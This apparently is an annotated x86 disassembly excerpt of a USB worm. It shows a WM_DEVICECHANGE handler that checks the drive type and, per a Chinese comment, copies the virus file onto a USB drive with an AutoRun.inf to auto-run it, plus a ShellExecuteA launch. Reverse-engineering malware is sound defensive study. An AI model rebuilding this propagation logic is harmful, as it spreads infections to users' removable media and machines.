00401473         >>mov     dl, byte ptr [eax]
00401475         .>mov     bl, byte ptr [esi]
00401477         .>mov     cl, dl
00401479         .>cmp     dl, bl
0040147B         .>jnz     short 0040149B
0040147D         .>test    cl, cl
0040147F         .>je      short 00401497
00401481         .>mov     dl, byte ptr [eax+1]
00401484         .>mov     bl, byte ptr [esi+1]
00401487         .>mov     cl, dl
00401489         .>cmp     dl, bl
0040148B         .>jnz     short 0040149B
0040148D         .>add     eax, 2
00401490         .>add     esi, 2
00401493         .>test    cl, cl
00401495         .>jnz     short 00401473
00401497         >>xor     eax, eax
00401499         .>jmp     short 004014A0
0040149B         >>sbb     eax, eax
0040149D         .>sbb     eax, -1
004014A0         >>test    eax, eax
004014A2         .>je      short 004014B4
004014A4         >>lea     eax, dword ptr [esp+2F4]
004014AB         .>push    eax
004014AC         .>call    00402430
004014B1         .>add     esp, 4
004014B4         >>lea     ecx, dword ptr [esp+2F4]
004014BB         .>push    ecx
004014BC         .>call    004024B0
004014C1         .>add     esp, 4
004014C4         .>test    eax, eax
004014C6         .>jnz     00401590
004014CC         .>push    5                          ; /IsShown = 5
004014CE         .>push    eax                        ; |DefDir
004014CF         .>push    eax                        ; |Parameters
004014D0         .>lea     edx, dword ptr [esp+300]   ; |
004014D7         .>push    edx                        ; |FileName
004014D8         .>push    00409200                   ; |Operation = "open"
004014DD         .>push    eax                        ; |hWnd
004014DE         .>call    dword ptr [40914C]         ; \ShellExecuteA
004014E4         .>jmp     00401590
004014E9         >>cmp     eax, 219
004014EE         .>je      short 00401514

00401514         >>cmp     dword ptr [esp+50C], 8000                    ;  Case 219 (WM_DEVICECHANGE) of 

switch 0040101B
0040151F         .>jnz     short 00401590
00401521         .>mov     ecx, dword ptr [esp+510]
00401528         .>mov     edx, dword ptr [ecx+C]
0040152B         .>push    edx
0040152C         .>mov     dword ptr [esp+14], 0
00401534         .>call    00401CC0
00401539         .>lea     edi, dword ptr [esp+14]
0040153D         .>add     esp, 4
00401540         .>mov     byte ptr [esp+10], al
00401544         .>dec     edi
00401545         >>mov     al, byte ptr [edi+1]
00401548         .>inc     edi
00401549         .>test    al, al
0040154B         .>jnz     short 00401545
0040154D         .>mov     ax, word ptr [4091FC]
00401553         .>mov     cl, byte ptr [4091FE]
00401559         .>lea     edx, dword ptr [esp+10]
0040155D         .>mov     word ptr [edi], ax
00401560         .>push    edx                                          ; /RootPathName
00401561         .>mov     byte ptr [edi+2], cl                         ; |
00401564         .>call    dword ptr [4090D0]                           ; \GetDriveTypeA
0040156A         .>sub     eax, 2                                       ;  Switch (cases 2..3)
0040156D         .>je      short 0040157E
0040156F         .>dec     eax
00401570         .>jnz     short 00401590
00401572         .>push    0040B858                                     ;  Case 3 of switch 0040156A
00401577         .>lea     eax, dword ptr [esp+14]
0040157B         .>push    eax
0040157C         .>jmp     short 00401588
0040157E         >>push    0040B858                                     ;  Case 2 of switch 0040156A
00401583         .>lea     ecx, dword ptr [esp+14]
00401587         .>push    ecx
00401588         >>call    00401CE0    ;把病毒文件复制到U盘,并生成AutoRun.inf文件使U盘的病毒自动运

0040158D         .>add     esp, 8
00401590         >>xor     eax, eax                                     ;  Default case of switch 0040156A
00401592         >>mov     ecx, dword ptr [esp+4FC]
00401599         .>pop     edi
0040159A         .>pop     esi
0040159B         .>pop     ebp
0040159C         .>pop     ebx
0040159D         .>call    00403279
004015A2         .>add     esp, 4F0
004015A8         .>retn    10
